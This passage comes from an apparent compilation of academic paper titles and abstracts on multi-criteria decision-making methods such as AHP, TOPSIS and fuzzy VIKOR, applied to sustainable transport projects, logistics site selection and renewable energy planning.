LSS of the projects are then used to produce a relative ranking of potential projects, for use as a decision support for project screening and selection. Proof-of-concept development of the proposed LSS framework is presented via a preliminary case study in Accra–Ghana and the results indicate that the framework adequately represented local sustainable transport needs, priorities and perceptions. The LSS determined for some selected projects maintained the original relative rankings that were already derived using conventional methods. The LSS also has the added advantage of evaluating projects of different scales, which were not easy to evaluate together by conventional methods. --- paper_title: An analytic hierarchy process model to evaluate road section design paper_content: AbstractThe traffic system is as essential to modern society as the circulatory system to the human body. Road section design is therefore a key infrastructure activity for economic development, and multi-criteria decision-making can provide an interdisciplinary approach that moves beyond purely economic optimisation to include technological, technical and ecological factors. The present work describes applying the multi-criteria Analytical Hierarchy Process (AHP) method to evaluate road section design in an urban environment through differential weighting of various criteria and sub-criteria. The model is tested on a stretch of National Road D8 in the municipality of Podstrana near the city of Split (Croatia), which serves as an important route for commuters and tourists. The proposed AHP model provided reliable results that were robust to sensitivity analysis. This approach involving differential criterion weighting may prove useful for evaluating and selecting appropriate road section designs for this ... --- paper_title: Multi‐criteria decision making support tool for freight integrators: Selecting the most sustainable alternative paper_content: Sustainable development has turned into a daily concept by now. Similarly, sustainable transport also appears increasingly oft en, primarily in transport policy and strategic plans. However, it would be equally important if we could apply this aspect for certain activities such as haulage and forwarding that are a part of transport. Today, forwarders select an optimal alternative concerning only the criteria related to the economic effectiveness of the transport task. In many cases, shippers are not aware neither of the concept of sustainable transport nor of harmful effects they generate. Hence, although there is a concept of ‘freight integrator’, only very few are able to meet the requirements laid down for it. No widespread method has been developed yet to compare transportation options. A similar situation can be faced discussing a traditional, purely economic approach and a theoretical modern aspect that would be in accordance with the principles of sustainable transport. The model that was developed at the Department of Aircraft and Ships of Budapest University of Technology and Economics was designed specifically to compare various options in terms of sustainability. The indicators as the elements of decision-making criteria applied in the model were derived from the indicators used for assessing the transport sector but modified according to the requirements of the decisionmaking task for a freight integrator. Finally, such sustainable performance index of certain alternatives is determined by two fundamentally different aggregation methods as ‘fineness index’. This article presents the model structure and application using a concrete example. --- paper_title: A new fuzzy additive ratio assessment method (ARAS‐F). Case study: The analysis of fuzzy multiple criteria in order to select the logistic centers location paper_content: Abstract The main approaches which are applied to select the logistic center are the methods of gravity center, analytic hierarchy process, similarity to ideal solution, fuzzy ranking, assessment, etc. Multiple Criteria Decision‐Making (MCDM) combines analytical and inductive knowledge, describing a domain problem, which can be fuzzy and/or incomplete. The fuzzy MCDM (FMCDM) approach can explain the problem more appropriately. The purpose of the paper is to select the most suitable site for logistic centre among a set of alternatives, to help the stakeholders with the performance evaluation in an uncertain environment, where the subjectivity and vagueness of criteria are described by triangular fuzzy numbers. The paper presents a newly‐developed ARAS‐F method to solve different problems in transport, construction, economics, technology and sustainable development. --- paper_title: New hybrid multi-criteria decision-making DEMATEL-MAIRCA model: sustainable selection of a location for the development of multimodal logistics centre paper_content: AbstractThe paper describes the application of a new multi-criteria decision-making (MCDM) model, MultiAtributive Ideal-Real Comparative Analysis (MAIRCA), used to select a location for the development of a multimodal logistics centre by the Danube River. The MAIRCA method is based on the comparison of theoretical and empirical alternative ratings. Relying on theoretical and empirical ratings the gap (distance) between the empirical and ideal alternative is defined. To determine the weight coefficients of the criteria, the DEMATEL method was applied. In this paper, through a sensitivity analysis, the results of MAIRCA and other MCDM methods – MOORA, TOPSIS, ELECTRE, COPRAS and PROMETHEE – were compared. The analysis showed that a smaller or bigger instability in alternative rankings appears in MOORA, TOPSIS, ELECTRE and COPRAS. On the other hand, the analysis showed that MAIRCA and PROMETHEE offer consistent solutions and have a stable and well-structured analytical framework for ranking the alternatives.... --- paper_title: An integrated MCDM approach considering demands-matching for reverse logistics paper_content: Abstract Reverse logistics (RL) has been regarded as a key driving force for remanufacturing. However, there are great uncertainties in terms of quality and quantity of used components for RL. There are also complexities in suppliers and operations. These make decision-making of RL very complex. In order to identify the best collection mode for used components, a demand-matching oriented Multiple Criteria Decision Making (MCDM) method is established. In this method, the damage level and remaining service life are firstly incorporated into the evaluation criteria of reuse modes, then a hybrid method (AHP-EW) that integrates Analytic Hierarchy Process (AHP) and Entropy Weight (EW) method is applied to derive criteria weights and the grey Multi-Attributive Border Approximation Area Comparison (MABAC) is adopted to rank the collection modes. Finally, sensitivity analysis is implemented to test the stability of the proposed method, and a demands-matching method is proposed to validate and evaluate the feasibility of the optimal alternative. The collection of used pressurizers is taken as case study to validate the applicability of the proposed model. The results showed the effectiveness of the proposed method in MCDM of RL. --- paper_title: Using a Novel Grey DANP Model to Identify Interactions between Manufacturing and Logistics Industries in China paper_content: As a crucial part of producer services, the logistics industry is highly dependent on the manufacturing industry. In general, the interactive development of the logistics and manufacturing industries is essential. Due to the existence of a certain degree of interdependence between any two factors, interaction between the two industries has produced a basis for measurement; identifying the key factors affecting the interaction between the manufacturing and logistics industries is a kind of decision problem in the field of multiple criteria decision making (MCDM). A hybrid MCDM method, DEMATEL-based ANP (DANP) is appropriate to solve this problem. However, DANP uses a direct influence matrix, which involves pairwise comparisons that may be more or less influenced by the respondents. Therefore, we propose a decision model, Grey DANP, which can automatically generate the direct influence matrix. Statistical data for the logistics and manufacturing industries in the China Statistical Yearbook (2006–2015) were used to identify the key factors for interaction between these two industries. The results showed that the key logistics criteria for interaction development are the total number of employees in the transport business, the volume of goods, and the total length of routes. The key manufacturing criteria for interaction development are the gross domestic product and the value added. Therefore, stakeholders should increase the number of employees in the transport industry and freight volumes. Also, the investment in infrastructure should be increased. --- paper_title: ELASTIC – A methodological framework for identifying and selecting sustainable transport indicators paper_content: There is significant reliance on sustainable transport indicators for monitoring and reporting progress towards sustainable transport. The selection of appropriate sustainability indicators presents a number of challenges however, not least because of the vast number of potential indicators available. To help address these challenges, this paper presents the Evaluative and Logical Approach to Sustainable Transport Indicator Compilation (ELASTIC) – a framework for identifying and selecting a small subset of sustainable transport indicators. ELASTIC is demonstrated with an application to the English Regions, UK. --- paper_title: Incorporating sustainability assessment in transportation planning: an urban transportation vehicle-based approach paper_content: ABSTRACTEnvironmental assessments are on the critical path for the development of land, infrastructure and transportation systems. These assessments are based on planning methods which, in turn, are subject to continuous enhancement. The substantial impacts of transportation on environment, society and economy strongly urge the incorporation of sustainability into transportation planning. Two major developments that enhance transportation sustainability are new fuels and vehicle power systems. Traditional planning ignores technology including the large differences among conventional, hybrid and alternative fuel vehicles and buses. The introduction of alternative fuel vehicles is likely to change the traditional transportation planning process because different characteristics need to be taken into account. In this study a sustainability framework is developed that enables assessment of transportation vehicle characteristics. Identified indicators are grouped in five sustainability dimensions (Environment,... --- paper_title: Setting the weights of sustainability criteria for the appraisal of transport projects paper_content: Although the Multi-Criteria Decision Analysis (MCDA) has made progress towards appraising and measuring the performance of smart and sustainable transport projects, it still has important issues that need to be addressed such as the problem associated with incomparable quantities, the inherent subjective qualitative assessment, the complexity of identifying impacts to be included and its measurement method, and the corresponding weights. The issue of trading-off different sustainability criteria is the main unresolved matter. This problem may lead to lack of accuracy in the decision making process. This paper presents a new methodology to set the weights of the sustainability criteria used in the MCDA in order to reduce subjectivity and imprecision. We suggest eliciting criteria weights based on both expert preferences and the importance that the sustainability criteria have in the geographical and social context where the project is developed. This novel methodology is applied to a real case study to quantify sustainable practices associated with the design and construction of a new roadway in Spain. The outcome demonstrates that the approach to the weighting problem has significance and general application in a multi-criteria evaluation process. --- paper_title: Prioritizing sustainable electricity production technologies: MCDM approach paper_content: Economic, technological, social, and political developments stressed the need for shifts in energy-mix. Therefore it is important to provide a rationale for sustainable decision making in energy policy. The aim of this paper is to develop the multi-criteria decision support framework for choosing the most sustainable electricity production technologies. Given selection of sustainable energy sources involves many conflicting criteria, multi-criteria decision methods MULTIMOORA and TOPSIS were employed for the analysis. The indicator system covering different approaches of sustainability was established. The analysis proved that the future energy policy should be oriented towards the sustainable energy technologies, namely water and solar thermal ones. It is the proposed multi-criteria assessment framework that can constitute a basis for further sub-regional optimization of sustainable energy policy. --- paper_title: An analytical method for the measurement of energy system sustainability in urban areas paper_content: Assessing the sustainability of urban energy systems and forecasting their development are important topics that have been the focus of recent research. In this paper, an approach for the measurement the sustainability of an urban energy system is introduced. The approach is based on prediction of the future energy needs within the consuming sectors of a city by specification of energy system development scenarios and validation of the scenarios by a multi-criteria decision method. Prediction of energy needs for the area of the city using the simulation model, model for analysis of the energy demands (MAED) is done. Finish the last level of aggregation, using the method of multi-criteria analysis, is getting the General Index of Sustainability (GIS), which shows a measure of the validity or viability, or quality of the investigated scenarios. In this way, the mathematical and graphical made a synthesis of all the indicators that are relevant to sustainable development. The accuracy in determining the mean of the GIS is checked by calculating the standard deviation. Also, a measure of reliability of the preference when watching a few consecutive scenarios was performed. The defined scenarios take into account the utilization of different energy sources, the exploitation of existing energy plants and infrastructure, and the building of new plants. The sustainability criteria are described by a unique set of economic, social and ecological indicators. The new approach was used to forecast the development of sustainable energy system in Belgrade, Serbia. --- paper_title: National Options for a Sustainable Nuclear Energy System: MCDM Evaluation Using an Improved Integrated Weighting Approach paper_content: While the prospects look bright for nuclear energy development in China, no consensus about an optimum transitional path towards sustainability of the nuclear fuel cycle has been achieved. Herein, we present a preliminary study of decision making for China’s future nuclear energy systems, combined with a dynamic analysis model. In terms of sustainability assessment based on environmental, economic, and social considerations, we compared and ranked the four candidate options of nuclear fuel cycles combined with an integrated evaluation analysis using the Multi-Criteria Decision Making (MCDM) method. An improved integrated weighting method was first applied in the nuclear fuel cycle evaluation study. This method synthesizes diverse subjective/objective weighting methods to evaluate conflicting criteria among the competing decision makers at different levels of expertise and experience. The results suggest that the fuel cycle option of direct recycling of spent fuel through fast reactors is the most competitive candidate, while the fuel cycle option of direct disposal of all spent fuel without recycling is the least attractive for China, from a sustainability perspective. In summary, this study provided a well-informed decision-making tool to support the development of national nuclear energy strategies. --- paper_title: A Spatial Decision Support System Framework for the Evaluation of Biomass Energy Production Locations: Case Study in the Regional Unit of Drama, Greece paper_content: Renewable Energy Sources are expected to play a very important role in energy production in the following years. They constitute an energy production methodology which, if properly enabled, can ensure energy sufficiency as well as the protection of the environment. Energy production from biomass in particular is a very common method, which exploits a variety of resources (wood and wood waste, agricultural crops and their by-products after cultivation, animal wastes, Municipal Solid Waste (MSW) and food processing wastes) for the production of energy. This paper presents a Spatial Decision Support System, which enables managers to locate the most suitable areas for biomass power plant installation. For doing this, fuzzy logic and fuzzy membership functions are used for the creation of criteria layers and suitability maps. In this paper, we use a Multicriteria Decision Analysis methodology (Analytical Hierarchy Process) combined with fuzzy system elements for the determination of the weight coefficients of the participating criteria. Then, based on the combination of fuzzy logic and theAnalytic Hierarchy Process (AHP), a final proposal is created thatdivides the area into four categories regarding their suitability forsupporting a biomass energy production power plant. For the two optimal locations, the biomass is also calculated.The framework is applied to theRegional Unit of Drama, which is situated in Northern Greece and is very well known for the area’s forest and agricultural production. --- paper_title: A novel integrated decision-making approach for the evaluation and selection of renewable energy technologies paper_content: The decision-making in energy sector involves finding a set of energy sources and conversion devices to meet the energy demands in an optimal way. Making an energy planning decision involves the balancing of diverse ecological, social, technical and economic aspects across space and time. Usually, technical and environmental aspects are represented in the form of multiple criteria and indicators that are often expressed as conflicting objectives. In order to attain higher efficiency in the implementation of renewable energy (RE) systems, the developers and investors have to deploy multi-criteria decision-making techniques. In this paper, a novel hybrid Decision Making Trial and Evaluation Laboratory and analytic network process (DEMATEL-ANP) model is proposed in order to stress the importance of the evaluation criteria when selecting alternative REs and the causal relationships between the criteria. Finally, complex proportional assessment and weighted aggregated sum product assessment methods are used to assess the performances of the REs with respect to different evaluating criteria. An illustrative example from Costs assessment of sustainable energy systems (CASES) project, financed by European Commission Framework 6 programme (EU FM 6) for EU member states is presented in order to demonstrate the application feasibility of the proposed model for the comparative assessment and ranking of RE technologies. Sensitivity analysis, result validation and critical outcomes are provided as well to offer guidelines for the policy makers in the selection of the best alternative RE with the maximum effectiveness. --- paper_title: Evaluation of renewable power sources using a fuzzy MCDM based on cumulative prospect theory: A case in China paper_content: Abstract Under the global implementation of low-carbon economy, the development of renewable energy becomes an important way of energy saving and emission reduction. Multi-criteria decision-making (MCDM) techniques are gaining popularity in renewable power sources (RPS) evaluation since this process involves many conflicting criteria. Classical MCDM techniques assume that decisions are conducted in a deterministic environment and decision-makers (DMs) are completely rational while facing with investment risks. However, these hypotheses are not supported in the RPS selection. Fortunately, fuzzy set theory enables to cope with vagueness of evaluations in decision-making process, and cumulative prospect theory can reflect the risk preference of DMs and describe the actual behavior of them. Therefore, in this paper, a fuzzy MCDM technique based on cumulative prospect theory is proposed for selecting the most appropriate RPS in China. A case study in China is carried out to illustrate the rationality and feasibility of the proposed method. The results show that the solar PV is determined to be the best one in China, but the optimal alternative is sensitive to the prospect parameters. This research provides insightful information for the public investors with different risk preferences to evaluate the RPS and select the most appropriate one under uncertain environment. --- paper_title: Comparing the sustainability of U.S. electricity options through multi-criteria decision analysis paper_content: Sustainable energy decision-making requires comparing energy options across a wide range of economic, environmental, social and technical implications. However, such comparisons based on quantitative data are currently limited at the national level. This is the first comparison of 13 currently operational renewable and non-renewable options for new US electricity generation using multi-criteria decision analysis with quantitative input values (minimum, nominal, and maximum) for 8 sustainability criteria (levelized cost of energy, life cycle greenhouse gas and criteria air pollutant emissions, land and water use, accident-related fatalities, jobs, and annual capacity factor) and 10 representative decision-maker preference scenarios. Results across several preference scenarios indicate that biopower and geothermal (flash and binary) currently score highest in sustainability for the US. Other renewable energy technologies generally offer substantial sustainability improvements over fossil fuel or nuclear technologies, and nuclear is preferable to fossil fuels in most scenarios. The relatively low ranking of natural gas combined cycle in most preference scenarios should encourage caution in adopting NGCC as a “bridge” to renewables. Although NGCC ranks high under economic and technical preference scenarios, renewables actually rank higher in both scenarios (hydro – economic; geothermal and biopower – technical). --- paper_title: Evaluating clean energy alternatives for Jiangsu, China: An improved multi-criteria decision making method paper_content: Promoting the utilization of clean energy has been identified as one potential solution to addressing environmental pollution and achieving sustainable development in many countries around the world. Evaluating clean energy alternatives includes a requirement to balance multiple conflict criteria, including technology, environment, economy and society, all of which are incommensurate and interdependent. Traditional MCDM (multi-criteria decision making) methods, such as the weighted average method, often fail to aggregate such criteria consistently. In this paper, an improved MCDM method based on fuzzy measure and integral is developed and applied to evaluate four primary clean energy options for Jiangsu Province, China. The results confirm that the preferred clean energy option for Jiangsu is solar photovoltaic, followed by wind, biomass and finally nuclear. A sensitivity analysis is also conducted to evaluate the values of clean energy resources for Jiangsu. The ordered weighted average method is also applied to compare the method mentioned above in our empirical study. The results show that the improved MCDM method provides higher discrimination between alternative clean energy alternatives. --- paper_title: Multi-Criteria Analysis of Electricity Generation Scenarios for Sustainable Energy Planning in Pakistan paper_content: The now over a decade-long electricity crisis in Pakistan has adversely affected the socio-economic development of the country. This situation is mainly due to a lack of sustainable energy planning and policy formulation. In this context, energy models can be of great help but only a handful of such efforts have been undertaken in Pakistan. Two key shortcomings pertaining to energy models lead to their low utilization in developing countries. First, the models do not effectively make decisions, but rather provide a set of alternatives based on modeling parameters; and secondly, the complexity of these models is often poorly understood by the decision makers. As such, in this study, the Analytical Hierarchy Process (AHP) methodology of Multi-Criteria Decision-Making (MCDM) has been used for the sustainability assessment of energy modeling results for long-term electricity planning. The four scenario alternatives developed in the energy modeling effort, Reference (REF), Renewable Energy Technologies (RET), Clean Coal Maximum (CCM) and Energy Efficiency and Conservation (EEC), have been ranked using the Expert Choice® tool based on the AHP methodology. The AHP decision support framework of this study revealed the EEC scenario as the most favorable electricity generation scenario followed by the REF, RET and CCM scenarios. Besides that, this study proposes policy recommendations to undertake integrated energy modeling and decision analysis for sustainable energy planning in Pakistan. --- paper_title: Location Selection for Wind Farms Using GIS Multi-Criteria Hybrid Model: An Approach Based on Fuzzy and Rough Numbers paper_content: This paper presents spatial mathematical model in order to identify sites for the wind farms installment which can have significant support for the planners in the area of strategy and management of wind power use. The suggested model is based on combined use of Geographical Information Systems (GIS) with multi-criteria techniques of Best-Worst method (BWM) and MultiAttributive Ideal-Real Comparative Analysis (MAIRCA). Rough numbers and fuzzy logic are used to exploit uncertainty during data analysis in spatial mathematical model. The model is applied on the case study. Rough BWM model is used to determine weight coefficients of the criteria and rough MAIRCA method is used to rank separated sustainable locations. The implementation of MAIRCA method has shown that the location L3 is the most suitable for the wind farm in the area covered in the case study. Therefore, the suggested spatial mathematical model can be successfully used to identify the potential suitable sites for the wind farms in other areas with similar geographic conditions. --- paper_title: Optimal site selection of electric vehicle charging station by using fuzzy TOPSIS based on sustainability perspective paper_content: Selecting the most sustainable site plays an important role in the life cycle of electric vehicle charging station (EVCS), which needs to consider some conflicting criteria. Different from the previous studies which mostly utilize programming (optimization) models, this paper employed a multi-criteria decision-making (MCDM) method to consider some subjective but important criteria for EVCS site selection. To reflect the ambiguity and vagueness due to the subjective judgments of decision makers, fuzzy TOPSIS method was applied to select the optimal EVCS site. Based on academic literatures, feasibility research reports and expert opinions in different fields, the evaluation index system for EVCS site selection was built from sustainability perspective, which consists of environmental, economic and social criteria associated with a total of 11 sub-criteria. Then, the criteria performances of different alternatives and criteria weights were judged by five groups of expert panels in the fields of environment, economy, society, electric power system and transportation system. Finally, the EVCS site alternatives were ranked by employing fuzzy TOPSIS method. The result shows EVCS site A2 located at Changping district in Beijing obtains the highest ranking score and should be selected as the optimal site. Meanwhile, the environmental and social criteria are paid more attentions from decision makers than economic criteria. The sensitivity analysis results indicate the alternative A2 always secures its top ranking no matter how sub-criteria weights change. It is effective and robust to apply fuzzy TOPSIS method into EVCS site selection. This paper provides a new research perspective for site selection and also extends the application domains of fuzzy TOPSIS method. --- paper_title: Applicability of multicriteria decision aid to sustainable hydropower paper_content: EU directives RESD (2001/77/EC) and WFD (2000/60/EC) can be considered as partially conflicting. Achieving a good qualitative and quantitative status of waters, what presumes “non-deterioration principle” of the existing ecological status in line with WFD, is conflicting with the construction of new hydropower plants that are promoting renewable energies, what is in line with RESD. --- paper_title: Energy project performance evaluation with sustainability perspective paper_content: Energy is a means of economic development by raising living standards and reducing poverty. Electricity production is a vital process for households, industries and commercial activities. No two power plants are alike; they may vary in technology, size, cost, environmental aspects etc., so that evaluations shall be made on a project basis, rather than technologies. Evaluation of the best energy project among many alternatives is a complex problem which cannot be simplified to economic feasibility only, requiring investors to also consider environmental and social circumstances. This paper proposes a novel method with a sustainability perspective for better selecting concretely defined energy projects. This method is based on two multi-criteria decision making (‘MCDM’) techniques; AHP for determining the importance weights of evaluation criteria and VIKOR for ranking energy project alternatives. The work differentiates itself in its emphasis to analyze actual projects instead of generic energy technologies, its consideration of similar project scales, and the use of Group Decision Making (‘GDM’) for aggregating expert opinions. The applicability of the method is demonstrated on a case study from Turkey, where one thermal power and three renewable energy projects are compared and ranked analytically. --- paper_title: Sustainability assessment of electricity generation technologies using weighted multi-criteria decision analysis paper_content: Solving the issue of environmental degradation due to the expansion of the World's energy demand requires a balanced approach. The aim of this paper is to comprehensively rank a large number of electricity generation technologies based on their compatibility with the sustainable development of the industry. The study is based on a set of 10 sustainability indicators which provide a life cycle analysis of the plants. The technologies are ranked using a weighted sum multi-attribute utility method. The indicator weights were established through a survey of 62 academics from the fields of energy and environmental science. Our results show that large hydroelectric projects are the most sustainable technology type, followed by small hydro, onshore wind and solar photovoltaic. We argue that political leaders should have a more structured and strategic approach in implementing sustainable energy policies and this type of research can provide arguments to support such decisions. --- paper_title: A Novel Approach for the Selection of Power-Generation Technology Using a Linguistic Neutrosophic CODAS Method: A Case Study in Libya paper_content: Rapid increases in energy demand and international drive to reduce carbon emissions from fossil fuels have led many oil-rich countries to diversify their energy portfolio and resources. Libya is one of these countries, and it has recently become interested in utilizing its renewable-energy resources in order to reduce financial and energy dependency on oil reserves. This paper introduces an original multicriteria decision-making Pairwise-CODAS model in which the modification of the CODAS method was made using Linguistic Neutrosophic Numbers (LNN). The paper also suggests a new LNN Pairwise (LNN PW) model for determining the weight coefficients of the criteria developed by the authors. By integrating these models with linguistic neutrosophic numbers, it was shown that it is possible to a significant extent to eliminate subjective qualitative assessments and assumptions by decision makers in complex decision-making conditions. The LNN PW-CODAS model was tested and validated in a case study of the selection of optimal Power-Generation Technology (PGT) in Libya. Testing of the model showed that the proposed model based on linguistic neutrosophic numbers provides objective expert evaluation by eliminating subjective assessments when determining the numerical values of criteria. A sensitivity analysis of the LNN PW-CODAS model, carried out through 68 scenarios of changes in the weight coefficients, showed a high degree of stability of the solutions obtained in the ranking of the alternatives. The results were validated by comparison with LNN extensions of four multicriteria decision-making models. --- paper_title: Assessing the sustainability of renewable energy technologies using multi-criteria analysis: Suitability of approach for national-scale assessments and associated uncertainties paper_content: Multi-criteria analyses (MCAs) are often applied to assess and compare the sustainability of different renewable energy technologies or energy plans with the aim to provide decision-support for choosing the most sustainable and suitable options either for a given location or more generically. MCAs are attractive given the multi-dimensional and complex nature of sustainability assessments, which typically involve a range of conflicting criteria featuring different forms of data and information. However, the input information on which the MCA is based is often associated with uncertainties. The aim of this study was to develop and apply a MCA for a national-scale sustainability assessment and ranking of eleven renewable energy technologies in Scotland and to critically investigate how the uncertainties in the applied input information influence the result. The developed MCA considers nine criteria comprising three technical, three environmental and three socio-economic criteria. Extensive literature reviews for each of the selected criteria were carried out and the information gathered was used with MCA to provide a ranking of the renewable energy alternatives. The reviewed criteria values were generally found to have wide ranges for each technology. To account for this uncertainty in the applied input information, each of the criteria values were defined by probability distributions and the MCA run using Monte Carlo simulation. Hereby a probabilistic ranking of the renewable energy technologies was provided. We show that the ranking provided by the MCA in our specific case is highly uncertain due to the uncertain input information. We conclude that it is important that future MCA studies address these uncertainties explicitly, when assessing the sustainability of different energy projects to obtain more robust results and ensure better informed decision-making. --- paper_title: Optimal Siting of Charging Stations for Electric Vehicles Based on Fuzzy Delphi and Hybrid Multi-Criteria Decision Making Approaches from an Extended Sustainability Perspective paper_content: Optimal siting of electric vehicle charging stations (EVCSs) is crucial to the sustainable development of electric vehicle systems. Considering the defects of previous heuristic optimization models in tackling subjective factors, this paper employs a multi-criteria decision-making (MCDM) framework to address the issue of EVCS siting. The initial criteria for optimal EVCS siting are selected from extended sustainability theory, and the vital sub-criteria are further determined by using a fuzzy Delphi method (FDM), which consists of four pillars: economy, society, environment and technology perspectives. To tolerate vagueness and ambiguity of subjective factors and human judgment, a fuzzy Grey relation analysis (GRA)-VIKOR method is employed to determine the optimal EVCS site, which also improves the conventional aggregating function of fuzzy Vlsekriterijumska Optimizacijia I Kompromisno Resenje (VIKOR). Moreover, to integrate the subjective opinions as well as objective information, experts’ ratings and Shannon entropy method are employed to determine combination weights. Then, the applicability of proposed framework is demonstrated by an empirical study of five EVCS site alternatives in Tianjin. The results show that A3 is selected as the optimal site for EVCS, and sub-criteria affiliated with environment obtain much more attentions than that of other sub-criteria. Moreover, sensitivity analysis indicates the selection results remains stable no matter how sub-criteria weights are changed, which verifies the robustness and effectiveness of proposed model and evaluation results. This study provides a comprehensive and effective method for optimal siting of EVCS and also innovates the weights determination and distance calculation for conventional fuzzy VIKOR. --- paper_title: GIS-based onshore wind farm site selection using Fuzzy Multi-Criteria Decision Making methods. Evaluating the case of Southeastern Spain paper_content: When it is necessary to select the best location to implant an onshore wind farm, the criteria that influence the decision-making are not always numerical values but can also include qualitative criteria in the form of labels or linguistic variables which can be represented through fuzzy membership. In this paper, some fuzzy approaches of different Multi-Criteria Decision Making (MCDM) methods are combined in order to deal with a trending decision problem such as onshore wind farm site selection. More specifically, the Fuzzy Analytic Hierarchy Process (FAHP) is applied to obtain the weights of the criteria, whereas the Fuzzy Technique for Order of Preference by Similarity to Ideal Solution (FTOPSIS) is used to evaluate the alternatives. A Geographic Information System (GIS) is applied to obtain the database of the alternatives and criteria which are transformed in a fuzzy decision matrix through triangular fuzzy numbers. The coast of the Murcia Region, located at the Southeast of Spain, has been chosen as the study area to carry out this evaluation. --- paper_title: Sustainable energy planning by using multi-criteria analysis application in the island of Crete paper_content: The sustainable energy planning includes a variety of objectives, as the decision-making is directly related to the processes of analysis and management of different types of information (technological, environmental, economic and social). Very often, the traditional evaluation methods, such as the cost-benefit analysis and macro-economic indicators, are not sufficient to integrate all the elements included in an environmentally thorough energy plan. On the contrary the multiple criteria methods provide a tool, which is more appropriate to assemble and to handle a wide range of variables that is evaluated in different ways and thus offer valid decision support. This paper exploits the multi-criteria methodology for the sustainable energy planning on the island of Crete in Greece. A set of energy planning alternatives are determined upon the implementation of installations of renewable energy sources on the island and are assessed against economic, technical, social and environmental criteria identified by the actors involved in the energy planning arena. The study constitutes an exploratory analysis with the potential to assist decision makers responsible for regional energy planning, providing them the possibility of creating classifications of alternative sustainable energy alternatives. --- paper_title: Multi-criteria sustainability analysis of thermal power plant Kolubara-A Unit 2 paper_content: The paper presents a possible approach for creating business decisions based on multi-criteria analysis. Seven options for a possible revitalization of the thermal power plant “Kolubara”-A Unit No. 2 with energy indicators of sustainable development (EISD) are presented in this paper. The chosen EISD numerically express the essential features of the analyzed options, while the sustainability criteria indicate the option quality within the limits of these indicators. In this paper, the criteria for assessing the sustainability options are defined based on several aspects: economic, social, environmental and technological. In the process of assessing the sustainability of the considered options the Analysis and Synthesis of Parameters under Information Deficiency (ASPID) method was used. In this paper, the EISD show that production and energy consumption are closely linked to economic, environmental and other indicators, such as economic and technological development of local communities with employment being one of the most important social parameter. Multi-criteria analysis for the case study of the TPP “Kolubara”-A clearly indicated recommendations to decision makers on the choice of the best available options in dependence on the energy policy. --- paper_title: Multi-criteria ranking of energy generation scenarios with Monte Carlo simulation paper_content: Integrated Assessment Models (IAMs) are omnipresent in energy policy analysis. Even though IAMs can successfully handle uncertainty pertinent to energy planning problems, they render multiple variables as outputs of the modelling. Therefore, policy makers are faced with multiple energy development scenarios and goals. Specifically, technical, environmental, and economic aspects are represented by multiple criteria, which, in turn, are related to conflicting objectives. Preferences of decision makers need to be taken into account in order to facilitate effective energy planning. Multi-criteria decision making (MCDM) tools are relevant in aggregating diverse information and thus comparing alternative energy planning options. The paper aims at ranking European Union (EU) energy development scenarios based on several IAMs with respect to multiple criteria. By doing so, we account for uncertainty surrounding policy priorities outside the IAM. In order to follow a sustainable approach, the ranking of policy options is based on EU energy policy priorities: energy efficiency improvements, increased use of renewables, reduction in and low mitigations costs of GHG emission. The ranking of scenarios is based on the estimates rendered by the two advanced IAMs relying on different approaches, namely TIAM and WITCH. The data are fed into the three MCDM techniques: the method of weighted aggregated sum/product assessment (WASPAS), the Additive Ratio Assessment (ARAS) method, and technique for order preference by similarity to ideal solution (TOPSIS). As MCDM techniques allow assigning different importance to objectives, a sensitivity analysis is carried out to check the impact of perturbations in weights upon the final ranking. The rankings provided for the scenarios by different MCDM techniques diverge, first of all, due to the underlying assumptions of IAMs. Results of the analysis provide valuable insights in integrated application of both IAMs and MCDM models for developing energy policy scenarios and decision making in energy sector. --- paper_title: Relational spatial database and multi-criteria decision methods for selecting optimum locations for photovoltaic power plants in the province of Seville (southern Spain) paper_content: This work aims to develop a methodology for selecting optimum locations for the construction of photovoltaic power plants. In order to achieve this, a data model is defined and a multi-criteria decision methodology, based on an analytical hierarchy process, is applied. In contrast to the previous studies, in which the spatial analysis was undertaken by a GIS managing different layers of information (grids, shapefiles, etc.), in this work the spatial analysis is carried out by means of an open-code spatial database management system: PostgreSQL-PostGIS. This system uses Structure Query Language to manage different tables in the context of relational spatial databases. The case study is the province of Seville (southern Spain), where this sort of facility already exists. The empirical analysis concludes that a large percentage of the province of Seville has an excellent potential for the installation of photovoltaic plants. The methodology allows the dynamic updating of criteria and parameters, as well as the reproducibility, scalability and automating of analyses carried out in other fields. --- paper_title: Solar PV power plant site selection using a GIS-AHP based approach with application in Saudi Arabia paper_content: Site selection for solar power plants is a critical issue for utility-size projects due to the significance of weather factors, proximity to facilities, and the presence of environmental protected areas. The primary goal of this research is to evaluate and select the best location for utility-scale solar PV projects using geographical information systems (GIS) and a multi-criteria decision-making (MCDM) technique. The model considers different aspects, such as economic and technical factors, with the goal of assuring maximum power achievement while minimizing project cost. An analytical hierarchy process (AHP) is applied to weigh the criteria and compute a land suitability index (LSI) to evaluate potential sites. The LSI model groups sites into five categories: “least suitable,” “marginally suitable,” “moderately suitable,” “highly suitable” and “most suitable.” A case study for Saudi Arabia is provided. Real climatology and legislation data, such as roads, mountains, and protected areas, are utilized in the model. The solar analyst tool in ArcGIS software is employed to calculate the solar insolation across the entire study area using actual atmospheric parameters. The air temperature map was created from real dispersed monitoring sensors across Saudi Arabia using interpolation. The overlaid result map showed that 16% (300,000 km2) of the study area is promising and suitable for deploying utility-size PV power plants while the most suitable areas to be in the north and northwest of the Saudi Arabia. It has been found that suitable lands are following the pattern of the approximate range of the proximity to main roads, transmission lines, and urban cities. More than 80% of the suitable areas had a moderate to high LSI. The integration of the GIS with MCDM methods has emerged as a highly useful technique to systematically deal with rich geographical information data and vast area as well as manipulate criteria importance towards introducing the best sites for solar power plants. --- paper_title: Assessing the global sustainability of different electricity generation systems paper_content: A model is presented for assessing the global sustainability of power plants. It uses requirement trees, value functions and the analytic hierarchy process. The model consists of 27 parameters and makes it possible to obtain a sustainability index for each conventional or renewable energy plant, throughout its life-cycle. Here the aim is to make society aware of the sustainability level for each type of power system. As a result, decision making can be done with greater objectivity in both the public and private sectors. The model can be useful for engineers, researchers and, in general, decision makers in the energy policy field. With the exception of biomass fuels, the results obtained reinforce the idea that renewable energies make a greater contribution to sustainable development than their conventional counterparts. Renewable energies have a sustainability index that varies between 0.39 and 0.80; 0 and 1 being the lowest and highest contribution to sustainability, respectively. On the other hand, conventional power plants obtained results that fall between 0.29 and 0.57. High temperature solar-thermal plants, wind farms, photovoltaic solar plants and mini-hydroelectric power plants occupy the first four places, in this order. --- paper_title: Application of multi-criteria decision analysis in design of sustainable environmental management system framework paper_content: Abstract Proactive environmental management initiatives such as pollution prevention, cleaner production and 